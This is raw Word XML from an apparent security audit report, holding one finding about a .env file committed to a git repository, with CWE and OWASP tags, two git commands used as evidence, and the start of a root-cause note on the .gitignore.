                <v:shape id="Shape 1642" o:spid="_x0000_s1228" style="position:absolute;top:7524;width:64801;height:8859;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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DwQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Li8Iw&#10;EL4L+x/CLOxNU0WKdI3iCgvFk6/idWhmm2IzKU3U9t9vBMHbfHzPWa5724g7db52rGA6SUAQl07X&#10;XCk4n37HCxA+IGtsHJOCgTysVx+jJWbaPfhA92OoRAxhn6ECE0KbSelLQxb9xLXEkftzncUQYVdJ&#10;3eEjhttGzpIklRZrjg0GW9oaKq/Hm1WQ1iYf8v2u3w4FXn4WXFRznir19dlvvkEE6sNb/HLnOs5P&#10;5zN4fhNPkKt/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAP8g6EPBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m19050,l6467474,v2527,,4956,484,7290,1439l6480126,5022r,875767l6474764,884362v-2334,967,-4763,1451,-7290,1463l19050,885825v-2526,-12,-4956,-496,-7290,-1463c9426,883394,7366,882018,5580,880244,3793,878446,2417,876393,1450,874055l,866775,,19050,1450,11745c2417,9413,3793,7348,5580,5569,7366,3783,9426,2406,11760,1439,14094,484,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,885825"/>
                </v:shape>
                <v:rect id="Rectangle 1711" o:spid="_x0000_s1229" style="position:absolute;top:2547;width:576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0EBB16B1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:color w:val="auto"/>
                            <w:sz w:val="20"/>
                            <w:szCs w:val="20"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:b/>
                            <w:color w:val="auto"/>
                            <w:sz w:val="20"/>
                            <w:szCs w:val="20"/>
                          </w:rPr>
                          <w:t xml:space="preserve">V-14 · </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1712" o:spid="_x0000_s1230" style="position:absolute;left:4381;top:2571;width:2858;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2857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4wgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X/A/LCN6ajQqtxKwiglgPlWrtfciOSTA7G3a3efz7bqHQ23x8z8m3g2lER87XlhXMkxQEcWF1&#10;zaWC2+fheQXCB2SNjWVSMJKH7WbylGOmbc8X6q6hFDGEfYYKqhDaTEpfVGTQJ7YljtzdOoMhQldK&#10;7bCP4aaRizR9kQZrjg0VtrSvqHhcv40C3ZfLcHTnL77o2+n83owfS71XajYddmsQgYbwL/5zv+k4&#10;/3W+gN9v4gly8wMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDQKj+4wgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l276225,v2630,,4875,930,6735,2778c284820,4638,285750,6890,285750,9525r,114300c285750,126454,284820,128699,282960,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,133350"/>
                </v:shape>
                <v:rect id="Rectangle 1713" o:spid="_x0000_s1231" style="position:absolute;left:4607;top:2808;width:31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6419C970" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>.</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:b/>
                            <w:color w:val="auto"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>env</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1714" o:spid="_x0000_s1232" style="position:absolute;left:7209;top:2547;width:2644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778B6A0F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:color w:val="auto"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:b/>
                            <w:color w:val="auto"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> committed to the repository</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1715" o:spid="_x0000_s1233" style="position:absolute;top:5136;width:587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132690F7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>OWASP</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1716" o:spid="_x0000_s1234" style="position:absolute;left:4418;top:5136;width:851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524C46BD" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> A05:2021 · </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1717" o:spid="_x0000_s1235" style="position:absolute;left:10819;top:5136;width:6842;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3FB4B513" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>CWE-540</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1718" o:spid="_x0000_s1236" style="position:absolute;left:15964;top:5136;width:87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3CC0BDB9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">, </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1719" o:spid="_x0000_s1237" style="position:absolute;left:16625;top:5136;width:6842;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005BCB75" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>CWE-538</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1720" o:spid="_x0000_s1238" style="position:absolute;left:21770;top:5136;width:140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74DB559A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> · </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1721" o:spid="_x0000_s1239" style="position:absolute;left:22825;top:5136;width:350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6B36634F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>High</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1722" o:spid="_x0000_s1240" style="position:absolute;left:1007;top:8979;width:2028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54E38751" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>$ git ls-files | grep -</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>i</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> env</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1723" o:spid="_x0000_s1241" style="position:absolute;left:1007;top:10789;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0402FF21" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>.env</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1724" o:spid="_x0000_s1242" style="position:absolute;left:1007;top:12503;width:4853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2A94C692" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">$ git log --diff-filter=A --format="%h %ad %s" --date=short </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>-- .env</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25574" o:spid="_x0000_s1243" style="position:absolute;left:1007;top:14218;width:72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HNyAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvuqloNdFVpLboUWMh9fbIviah2bchuzVpf323UPA4zMw3zHrbm1rcqHWVZQWPkwgE&#10;cW51xYWCt8vreAnCeWSNtWVS8E0OtpvhYI2Jth2f6Zb6QgQIuwQVlN43iZQuL8mgm9iGOHgftjXo&#10;g2wLqVvsAtzUchpFT9JgxWGhxIaeS8o/0y+j4LBsdu9H+9MV9cv1kJ2yeH+JvVIPo363AuGp9/fw&#10;f/uoFUzn88UM/u6EKyA3vwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBncCHNyAAAAN4A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="1B5D5FD3" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>8</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25575" o:spid="_x0000_s1244" style="position:absolute;left:1552;top:14218;width:1521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RWxwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvulFI1TQbEW3RY9WC7e2RfU2C2bchuzWpv94tCD0OM/MNk656U4srta6yrGA6iUAQ&#10;51ZXXCj4OL2NFyCcR9ZYWyYFv+RglQ0HKSbadnyg69EXIkDYJaig9L5JpHR5SQbdxDbEwfu2rUEf&#10;ZFtI3WIX4KaWsyh6lgYrDgslNrQpKb8cf4yC3aJZf+7trSvq16/d+f283J6WXqmnUb9+AeGp9//h&#10;R3uvFczieB7D351wBWR2BwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAg8hFbHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5BE997BA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>b9653b 2025-12-06 env</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1726" o:spid="_x0000_s1245" style="position:absolute;top:17900;width:34908;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4DAA8185" w14:textId="74DC4273" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Root </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>cause</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> and this is the part that matters.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1727" o:spid="_x0000_s1246" style="position:absolute;left:26247;top:17900;width:438;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7162A332" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1728" o:spid="_x0000_s1247" style="position:absolute;left:26574;top:17716;width:6382;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="638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nddxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;EMXvhX6HMIXeatZFqqxGkYLFS6H+6X26GTeLm8mSRN1++85B8DbDe/PebxarwXfqSjG1gQ2MRwUo&#10;4jrYlhsDx8PmbQYqZWSLXWAy8EcJVsvnpwVWNtx4R9d9bpSEcKrQgMu5r7ROtSOPaRR6YtFOIXrM&#10;ssZG24g3CfedLoviXXtsWRoc9vThqD7vL95Asf38tbT5mRzWkxTdrAyXr+9gzOvLsJ6DyjTkh/l+&#10;vbWCPy0FV76REfTyHwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJY2d13EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l628650,v2630,,4876,930,6735,2778c637245,4638,638175,6890,638175,9525r,114300c638175,126454,637245,128699,635385,130559v-1859,1848,-4105,2779,-6735,2791l9525,133350v-2630,-12,-4875,-943,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,638175,133350"/>
                </v:shape>
                <v:rect id="Rectangle 1729" o:spid="_x0000_s1248" style="position:absolute;left:26847;top:17953;width:7752;height:1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726B647F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>.</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>gitignore</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1730" o:spid="_x0000_s1249" style="position:absolute;left:32946;top:17900;width:3234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1R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KdtrVHHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6F4F272A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> was the stock Vite template: 27 lines covering</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1731" o:spid="_x0000_s1250" style="position:absolute;top:19431;width:7524;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="75247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eORxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/Q/LFHrTjVpsTbOKtLR68dBUhNyG7ORBs7MhuzWpv94VBG/z8T0nWQ+mESfqXG1ZwXQSgSDO&#10;ra65VHD4+Ry/gnAeWWNjmRT8k4P16mGUYKxtz990Sn0pQgi7GBVU3rexlC6vyKCb2JY4cIXtDPoA&#10;u1LqDvsQbho5i6KFNFhzaKiwpfeK8t/0zyigZZHLbDs/nvfpR1+kz0fN2ZdST4/D5g2Ep8HfxTf3&#10;Tof5L/MpXL8JJ8jVBQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKo145HEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l742950,v2630,,4875,930,6735,2778c751545,4638,752475,6890,752475,9525r,123825c752475,135979,751545,138224,749685,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791l,133350,,9525,2790,2778c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,752475,142875"/>
                </v:shape>
                <v:rect id="Rectangle 1732" o:spid="_x0000_s1251" style="position:absolute;left:269;top:19667;width:930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39E0594F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>node_modules</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1733" o:spid="_x0000_s1252" style="position:absolute;left:7533;top:19614;width:87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185EE1EF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">, </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1734" o:spid="_x0000_s1253" style="position:absolute;left:8191;top:19431;width:2858;height:1428;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wJxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/odlhN7qxtqHRFcRbaE9CBr1PmTHbDA7m2a3MfbXd4WCt/n4njNbdLYSLTW+dKxgNExAEOdO&#10;l1woOOw/HicgfEDWWDkmBVfysJj3ezNMtbvwjtosFCKGsE9RgQmhTqX0uSGLfuhq4sidXGMxRNgU&#10;Ujd4ieG2kk9J8iotlhwbDNa0MpSfsx+rYFNXZZAv7+fvzS4z1+N2/dWuf5V6GHTLKYhAXbiL/92f&#10;Os5/Gz/D7Zt4gpz/AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAA7WfAnEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l276225,v2630,,4875,930,6735,2778c284820,4638,285750,6890,285750,9525r,123825c285750,135979,284820,138224,282960,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,142875"/>
                </v:shape>
                <v:rect id="Rectangle 1735" o:spid="_x0000_s1254" style="position:absolute;left:8463;top:19667;width:31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40950E7C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>dist</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
